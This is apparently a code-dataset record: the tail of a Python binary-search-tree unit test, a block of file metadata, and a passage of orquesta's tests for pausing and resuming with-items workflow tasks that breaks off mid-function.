for element in elements:
tree.insert(element)
self.assertEqual(height, tree.height())
def test_find(self):
test_data = [
([1, 2, 3, 4, 5, 6], 4, True),
([6, 5, 4, 3, 2, 1], 19, False),
([2, 1, 3], 54, False),
([20, 10, 30, 15, 5], 15, True),
([20, 10, 30, 15, 16], 4, False),
]
for (elements, x, answer) in test_data:
tree = BinarySearchTree()
for element in elements:
tree.insert(element)
self.assertEqual(tree.find(x), answer)
def test_successor(self):
test_data = [
([1, 2, 3, 4, 5, 6], 4, 5),
([6, 5, 4, 3, 2, 1], 1, 2),
([2, 1, 3], 3, None),
([20, 10, 30, 15, 5], 15, 20),
([20, 10, 30, 15, 16], 15, 16),
]
for (elements, x, answer) in test_data:
tree = BinarySearchTree()
for element in elements:
tree.insert(element)
node = tree.root.find_in_subtree(x)
successor = node.successor()
self.assertTrue((successor is None) == (answer is None))
if successor is not None and answer is not None:
self.assertTrue(successor.value == answer)
def test_delete_case1(self):
# case 1.1
node15 = BinarySearchTree.Node.leaf_node(15)
node25 = BinarySearchTree.Node.leaf_node(25)
node20 = BinarySearchTree.Node.with_children(node15, 20, node25)
node55 = BinarySearchTree.Node.leaf_node(55)
node65 = BinarySearchTree.Node.leaf_node(65)
node60 = BinarySearchTree.Node.with_children(node55, 60, node65)
node70 = BinarySearchTree.Node.with_children(node60, 70, None)
root = BinarySearchTree.Node.with_children(node20, 50, node70)
tree = BinarySearchTree()
tree.root = root
tree.delete(15)
self.assertEqual(False, tree.find(15))
# case 1.2
node15 = BinarySearchTree.Node.leaf_node(15)
node25 = BinarySearchTree.Node.leaf_node(25)
node20 = BinarySearchTree.Node.with_children(node15, 20, node25)
node55 = BinarySearchTree.Node.leaf_node(55)
node65 = BinarySearchTree.Node.leaf_node(65)
node60 = BinarySearchTree.Node.with_children(node55, 60, node65)
node70 = BinarySearchTree.Node.with_children(node60, 70, None)
root = BinarySearchTree.Node.with_children(node20, 50, node70)
tree = BinarySearchTree()
tree.root = root
tree.delete(65)
self.assertEqual(False, tree.find(65))
def test_delete_case2(self):
# case 2.1
node15 = BinarySearchTree.Node.leaf_node(15)
node25 = BinarySearchTree.Node.leaf_node(25)
node20 = BinarySearchTree.Node.with_children(node15, 20, node25)
node55 = BinarySearchTree.Node.leaf_node(55)
node65 = BinarySearchTree.Node.leaf_node(65)
node60 = BinarySearchTree.Node.with_children(node55, 60, node65)
node70 = BinarySearchTree.Node.with_children(node60, 70, None)
root = BinarySearchTree.Node.with_children(node20, 50, node70)
tree = BinarySearchTree()
tree.root = root
tree.delete(70)
self.assertEqual(False, tree.find(70))
def test_delete_case31(self):
# case 3.1
node15 = BinarySearchTree.Node.leaf_node(15)
node25 = BinarySearchTree.Node.leaf_node(25)
node20 = BinarySearchTree.Node.with_children(node15, 20, node25)
node55 = BinarySearchTree.Node.leaf_node(55)
node65 = BinarySearchTree.Node.leaf_node(65)
node60 = BinarySearchTree.Node.with_children(node55, 60, node65)
node70 = BinarySearchTree.Node.with_children(node60, 70, None)
root = BinarySearchTree.Node.with_children(node20, 50, node70)
tree = BinarySearchTree()
tree.root = root
tree.delete(20)
self.assertEqual(False, tree.find(20))
def test_delete_case32(self):
# case 3.2
node15 = BinarySearchTree.Node.leaf_node(15)
node25 = BinarySearchTree.Node.leaf_node(25)
node20 = BinarySearchTree.Node.with_children(node15, 20, node25)
node65 = BinarySearchTree.Node.leaf_node(65)
node60 = BinarySearchTree.Node.with_children(None, 60, node65)
node70 = BinarySearchTree.Node.with_children(node60, 70, None)
root = BinarySearchTree.Node.with_children(node20, 50, node70)
tree = BinarySearchTree()
tree.root = root
tree.delete(50)
self.assertEqual(False, tree.find(50))
def test_is_correct(self):
# case 3.2
node15 = BinarySearchTree.Node.leaf_node(15)
node25 = BinarySearchTree.Node.leaf_node(25)
node20 = BinarySearchTree.Node.with_children(node15, 20, node25)
node65 = BinarySearchTree.Node.leaf_node(65)
node60 = BinarySearchTree.Node.with_children(None, 60, node65)
node70 = BinarySearchTree.Node.with_children(node60, 70, None)
root = BinarySearchTree.Node.with_children(node20, 50, node70)
tree = BinarySearchTree()
tree.root = root
self.assertEqual(True, tree.is_correct())
node15 = BinarySearchTree.Node.leaf_node(15)
node25 = BinarySearchTree.Node.leaf_node(25)
root = BinarySearchTree.Node.with_children(node15, 10, node25)
tree = BinarySearchTree()
tree.root = root
self.assertEqual(False, tree.is_correct())
# def randomized_test
| 33.298578
| 72
| 0.603046
| 817
| 7,026
| 5.077111
| 0.111383
| 0.236258
| 0.144648
| 0.192864
| 0.811234
| 0.762777
| 0.746384
| 0.731437
| 0.731437
| 0.731437
| 0
| 0.091635
| 0.287077
| 7,026
| 211
| 73
| 33.298578
| 0.736474
| 0.01039
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093333
| 1
| 0.073333
| false
| 0
| 0.02
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fcab320cbd57f1e9f3857062c6f37d400f560bed
| 37,742
|
py
|
Python
|
orquesta/tests/unit/conducting/test_workflow_conductor_with_items_pause_and_resume.py
|
igcherkaev/orquesta
|
2baa66d33f53cb04b660b3ce284a52d478ecc528
|
[
"Apache-2.0"
] | 85
|
2018-07-26T04:29:49.000Z
|
2022-03-31T10:47:50.000Z
|
orquesta/tests/unit/conducting/test_workflow_conductor_with_items_pause_and_resume.py
|
igcherkaev/orquesta
|
2baa66d33f53cb04b660b3ce284a52d478ecc528
|
[
"Apache-2.0"
] | 149
|
2018-07-27T22:36:45.000Z
|
2022-03-31T10:54:32.000Z
|
orquesta/tests/unit/conducting/test_workflow_conductor_with_items_pause_and_resume.py
|
igcherkaev/orquesta
|
2baa66d33f53cb04b660b3ce284a52d478ecc528
|
[
"Apache-2.0"
] | 24
|
2018-08-07T13:37:41.000Z
|
2021-12-16T18:12:43.000Z
|
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import conducting
from orquesta.specs import native as native_specs
from orquesta import statuses
from orquesta.tests.unit import base as test_base
class WorkflowConductorWithItemsPauseResumeTest(test_base.WorkflowConductorWithItemsTest):
def test_pause_item_list_processed(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
mock_ac_ex_statuses = [
statuses.SUCCEEDED,
statuses.PAUSED,
statuses.SUCCEEDED,
statuses.SUCCEEDED,
]
expected_task_statuses = [
statuses.RUNNING,
statuses.PAUSING,
statuses.PAUSING,
statuses.PAUSED,
]
expected_workflow_statuses = [
statuses.RUNNING,
statuses.RUNNING,
statuses.RUNNING,
statuses.PAUSED,
]
self.assert_task_items(
conductor,
task_name,
task_route,
task_ctx,
task_ctx["xs"],
task_action_specs,
mock_ac_ex_statuses,
expected_task_statuses,
expected_workflow_statuses,
)
# Assert the task is not removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the workflow is paused.
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
def test_pause_item_list_incomplete(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
mock_ac_ex_statuses = [statuses.SUCCEEDED, statuses.PAUSED, statuses.SUCCEEDED]
expected_task_statuses = [statuses.RUNNING, statuses.PAUSING, statuses.PAUSED]
expected_workflow_statuses = [statuses.RUNNING, statuses.RUNNING, statuses.PAUSED]
self.assert_task_items(
conductor,
task_name,
task_route,
task_ctx,
task_ctx["xs"],
task_action_specs,
mock_ac_ex_statuses,
expected_task_statuses,
expected_workflow_statuses,
)
# Assert the task is not removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the workflow is canceled.
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
def test_resume_paused_item_list_processed(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
mock_ac_ex_statuses = [
statuses.SUCCEEDED,
statuses.PAUSED,
statuses.SUCCEEDED,
statuses.SUCCEEDED,
]
expected_task_statuses = [
statuses.RUNNING,
statuses.PAUSING,
statuses.PAUSING,
statuses.PAUSED,
]
expected_workflow_statuses = [
statuses.RUNNING,
statuses.RUNNING,
statuses.RUNNING,
statuses.PAUSED,
]
self.assert_task_items(
conductor,
task_name,
task_route,
task_ctx,
task_ctx["xs"],
task_action_specs,
mock_ac_ex_statuses,
expected_task_statuses,
expected_workflow_statuses,
)
# Assert the task is not removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
# Resume the paued action execution.
self.forward_task_item_statuses(conductor, task_name, 1, [statuses.RUNNING])
# Assert the task and workflow is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
staged_task = conductor.workflow_state.get_staged_task(task_name, task_route)
self.assertIsNotNone(staged_task)
self.assertIn("items", staged_task)
self.assertEqual(staged_task["items"][1]["status"], statuses.RUNNING)
self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
# Complete the resumed action execution.
self.forward_task_item_statuses(
conductor, task_name, 1, [statuses.SUCCEEDED], result=task_ctx["xs"][1]
)
# Assert the task is removed from staging.
self.assertIsNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the task and workflow succeeded.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.SUCCEEDED)
self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_using_pausing_status_with_items_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
# Verify the set of action executions.
expected_task = self.format_task_item(
task_name,
task_route,
task_ctx,
conductor.spec.tasks.get_task(task_name),
actions=task_action_specs,
items_count=len(task_ctx["xs"]),
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
# Set the items to running status.
for i in range(0, len(task_ctx["xs"])):
self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
# Assert that the task is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
# Pause the workflow.
conductor.request_workflow_status(statuses.PAUSING)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSING)
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.PAUSING)
# Complete the items.
for i in range(0, len(task_ctx["xs"])):
result = task_ctx["xs"][i]
status_changes = [statuses.SUCCEEDED]
self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
# Assert the task and workflow are completed.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.SUCCEEDED)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
# Resume the workflow.
conductor.request_workflow_status(statuses.RESUMING)
self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_using_paused_status_with_items_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
# Verify the set of action executions.
expected_task = self.format_task_item(
task_name,
task_route,
task_ctx,
conductor.spec.tasks.get_task(task_name),
actions=task_action_specs,
items_count=len(task_ctx["xs"]),
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
# Set the items to running status.
for i in range(0, len(task_ctx["xs"])):
self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
# Assert that the task is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
# Pause the workflow.
conductor.request_workflow_status(statuses.PAUSED)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSING)
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.PAUSING)
# Complete the items.
for i in range(0, len(task_ctx["xs"])):
result = task_ctx["xs"][i]
status_changes = [statuses.SUCCEEDED]
self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
# Assert the task and workflow are completed.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.SUCCEEDED)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
# Resume the workflow.
conductor.request_workflow_status(statuses.RESUMING)
self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_using_pausing_status_with_items_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
mock_ac_ex_statuses = [statuses.SUCCEEDED] * 2
expected_task_statuses = [statuses.RUNNING] * 2
expected_workflow_statuses = [statuses.RUNNING] * 2
self.assert_task_items(
conductor,
task_name,
task_route,
task_ctx,
task_ctx["xs"],
task_action_specs,
mock_ac_ex_statuses,
expected_task_statuses,
expected_workflow_statuses,
concurrency=concurrency,
)
# Assert the task is not removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the workflow is still running.
self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
# Pause the workflow.
conductor.request_workflow_status(statuses.PAUSING)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.PAUSED)
# Resume the workflow.
conductor.request_workflow_status(statuses.RESUMING)
self.assertEqual(conductor.get_workflow_status(), statuses.RESUMING)
# Verify the second set of action executions.
expected_task = self.format_task_item(
task_name,
task_route,
task_ctx,
conductor.spec.tasks.get_task(task_name),
actions=task_action_specs[concurrency:],
items_count=len(task_ctx["xs"]),
items_concurrency=concurrency,
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
# Set the items to running status.
for i in range(0 + concurrency, len(task_ctx["xs"])):
self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
# Assert that the task is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
# Complete the items.
for i in range(0 + concurrency, len(task_ctx["xs"])):
result = task_ctx["xs"][i]
status_changes = [statuses.SUCCEEDED]
self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
# Assert the task and workflow are completed.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.SUCCEEDED)
self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_using_paused_status_with_items_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
mock_ac_ex_statuses = [statuses.SUCCEEDED] * 2
expected_task_statuses = [statuses.RUNNING] * 2
expected_workflow_statuses = [statuses.RUNNING] * 2
self.assert_task_items(
conductor,
task_name,
task_route,
task_ctx,
task_ctx["xs"],
task_action_specs,
mock_ac_ex_statuses,
expected_task_statuses,
expected_workflow_statuses,
concurrency=concurrency,
)
# Assert the task is not removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the workflow is still running.
self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
# Pause the workflow.
conductor.request_workflow_status(statuses.PAUSED)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.PAUSED)
# Resume the workflow.
conductor.request_workflow_status(statuses.RESUMING)
self.assertEqual(conductor.get_workflow_status(), statuses.RESUMING)
# Verify the second set of action executions.
expected_task = self.format_task_item(
task_name,
task_route,
task_ctx,
conductor.spec.tasks.get_task(task_name),
actions=task_action_specs[concurrency:],
items_count=len(task_ctx["xs"]),
items_concurrency=concurrency,
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
# Set the items to running status.
for i in range(0 + concurrency, len(task_ctx["xs"])):
self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
# Assert that the task is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
# Complete the items.
for i in range(0 + concurrency, len(task_ctx["xs"])):
result = task_ctx["xs"][i]
status_changes = [statuses.SUCCEEDED]
self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
# Assert the task and workflow are completed.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.SUCCEEDED)
self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_with_items_concurrency_and_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
# Verify the first set of action executions.
expected_task = self.format_task_item(
task_name,
task_route,
task_ctx,
conductor.spec.tasks.get_task(task_name),
actions=task_action_specs[0:concurrency],
items_count=len(task_ctx["xs"]),
items_concurrency=concurrency,
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
# Set the items to running status.
for i in range(0, concurrency):
self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
# Assert that the task is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
# Pause the workflow.
conductor.request_workflow_status(statuses.PAUSING)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSING)
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.PAUSING)
# Complete the items.
for i in range(0, concurrency):
result = task_ctx["xs"][i]
status_changes = [statuses.SUCCEEDED]
self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
# Assert the task and workflow are paused.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.PAUSED)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
# Resume the workflow.
conductor.request_workflow_status(statuses.RESUMING)
self.assertEqual(conductor.get_workflow_status(), statuses.RESUMING)
# Verify the second set of action executions.
expected_task = self.format_task_item(
task_name,
task_route,
task_ctx,
conductor.spec.tasks.get_task(task_name),
actions=task_action_specs[concurrency:],
items_count=len(task_ctx["xs"]),
items_concurrency=concurrency,
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
# Set the items to running status.
for i in range(0 + concurrency, len(task_ctx["xs"])):
self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
# Assert that the task is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
# Complete the items.
for i in range(0 + concurrency, len(task_ctx["xs"])):
result = task_ctx["xs"][i]
status_changes = [statuses.SUCCEEDED]
self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
# Assert the task and workflow are completed.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.SUCCEEDED)
self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pending_item_list_processed(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
mock_ac_ex_statuses = [
statuses.SUCCEEDED,
statuses.PENDING,
statuses.SUCCEEDED,
statuses.SUCCEEDED,
]
expected_task_statuses = [
statuses.RUNNING,
statuses.PAUSING,
statuses.PAUSING,
statuses.PAUSED,
]
expected_workflow_statuses = [
statuses.RUNNING,
statuses.RUNNING,
statuses.RUNNING,
statuses.PAUSED,
]
self.assert_task_items(
conductor,
task_name,
task_route,
task_ctx,
task_ctx["xs"],
task_action_specs,
mock_ac_ex_statuses,
expected_task_statuses,
expected_workflow_statuses,
)
# Assert the task is not removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the workflow is paused.
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
def test_resume_pending_item_list_processed(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
mock_ac_ex_statuses = [
statuses.SUCCEEDED,
statuses.PENDING,
statuses.SUCCEEDED,
statuses.SUCCEEDED,
]
expected_task_statuses = [
statuses.RUNNING,
statuses.PAUSING,
statuses.PAUSING,
statuses.PAUSED,
]
expected_workflow_statuses = [
statuses.RUNNING,
statuses.RUNNING,
statuses.RUNNING,
statuses.PAUSED,
]
self.assert_task_items(
conductor,
task_name,
task_route,
task_ctx,
task_ctx["xs"],
task_action_specs,
mock_ac_ex_statuses,
expected_task_statuses,
expected_workflow_statuses,
)
# Assert the task is not removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
# Resume the paued action execution.
self.forward_task_item_statuses(conductor, task_name, 1, [statuses.RUNNING])
# Assert the task and workflow is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
staged_task = conductor.workflow_state.get_staged_task(task_name, task_route)
